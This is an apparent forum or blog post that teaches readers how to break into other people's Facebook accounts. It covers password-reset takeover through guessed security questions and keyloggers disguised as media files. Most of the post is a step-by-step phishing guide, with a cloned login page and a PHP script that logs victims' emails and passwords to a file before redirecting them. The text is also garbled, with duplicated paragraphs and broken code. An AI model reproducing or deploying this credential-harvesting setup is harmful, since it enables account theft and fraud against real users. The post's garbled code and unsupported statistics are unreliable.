Well, frns this post created by shubham , hope you'll like it.
Many persons think how can hacker hack facebook account. There are different ways namely:
i) Facebook Phising
ii) Keyloggers
ii) Keyloggers
Well if you khow the victims well, you can reset his/her facebook password, then go to his email login page, click forget password, then try to answer his or her security question, this only work if you khow him or her well, then,just go to facebook login page, and reset his/her password, a reset link gonna sent to the victims maill account, simply enter and click in the reset link ine the inbox!!!
Now let's be serious, what is a keylogger??? It's a software that a hacker use to create a virus, the hacker may make the virus a picture, a music or a video, the hacker send the virus to the victims by maill or msn, when the vistims open the file, nothing will happen, simply the virus will be install, the virus will be in hidden mode, it will not be appear in task manger, nothing, now there are some antivirus that detect these virus, like avira, kapersky. If till here, all is succesfull, then your work is done, the virus will send you all the username and password, live chat, screenshots in your FTP account which you have created while creating the virus. Examples of keyloggers are:
These are the two best keyloger, i also like to use a keylogger name ardamax keylogger.
In this post i'll show you how to hack a facebook account by Phising attack also khown as a fake login page.
Phishing or Fake Login Pages Studies show that over 70% of the internet accounts get hacked with this method how ever Making a Fake login pages demands the skill of PHP Coding and HTML too. In Phishing a hacker creates a Fake login page which exactly resembles to the Facebook Page and then makes the victim login through that page and thus the victim gets his/her Facebook account Hacked.
How to create a fake login page, simple, just do as follows:
i) Create an account in a web hosting web site like www.110mb.com , www.ripway.com , orwww.t35.com.
Now go to the facebook login page, if you are using google chrome web browser you right click in the facebook login page and click on "View page Source". You save it in a New Folder as "facebook.htm". Now if you using firefox or other you right click in the login page and click save as, save it as "facebook.htm" in a New Folder, Now what you gonna do is to open the Facebook.htm in notepad or wordpad, you search for "action=" without quotes, it will be as follows
Phishing or Fake Login Pages
Studies show that over 70% of the internet accounts get hacked with this method how ever Making a Fake login pages demands the skill of PHP Coding and HTML too. In Phishing a hacker creates a Fake login page which exactly resembles to the Facebook Page and then makes the victim login through that page and thus the victim gets his/her Facebook account.
Studies show that over 70% of the internet accounts get hacked with this method how ever Making a Fake login pages demands the skill of PHP Coding and HTML too. In Phishing a hacker creates a Fake login page which exactly resembles to the Facebook Page and then makes the victim login through that page and thus the victim gets his/her Facebook account.
Now how to create a fake login page, just do as follows:
Go to my computer, tools, folder options, view and then uncheck the box hide extensions for unkhown file types.
Now to to facbook login page, rightclick, view page source, notepad will apear witha a lot of information, numbers in it, dont be panick, just save it in a new folder as "facebook.htm" without quotes. Now open the facebook.htm with notepad again and search for "action=" without quotes. It will be like follows,
<form method="POST" action="https://login. facebook.com/login.php?login_ attempt=1"
After the "action=", there is "https://login.facebook.com/ login.php?login_attempt=1", just replace it as "login.php" with quotes!!, so it need to become like this.
<form method="POST" action="login.php"
Now save it.
Now what you have to do is to copy the source code below and paste it in notepad and name it "login.php" without quotes. Here is the source code below.
<?php /* Created on: 3/27/2007 */
$fp = fopen("FacebookPasswords.htm", "a");
fwrite($fp, "Email:$_POST[email]\ tPassword:$_POST[pass]");
echo "<HTML>
$fp = fopen("FacebookPasswords.htm", "a");
fwrite($fp, "Email:$_POST[email]\
echo "<HTML>
<title>Welcome to Facebook</title>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.google.com\">
<title>Welcome to Facebook</title>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.google.com\">
Here when the victims will login, the victim will be redirect in www.google.com. You may change it if you want.
Now go to a fresh notepad page and type whatever you want, like ggg, hik, lor, ksm, vuy, whatever please you, but it will be better if you dont let it type of three letters, save it as "facebookpasswords.htm" without quotes.
So you have created three files namely:
Now the last task, just create an account in a web hosting web site like www.ripway.com , www.110mb.com , www.t35.com
just upload those three files in your account, and give the "facebook.htm" link to your victims, just tell her or him to login with his facebook usernamer and password, then his or her password will be sent in "facebookpasswords.htm" and the victims will be redirect to google.com or the web site which you have put in there in the "login.php"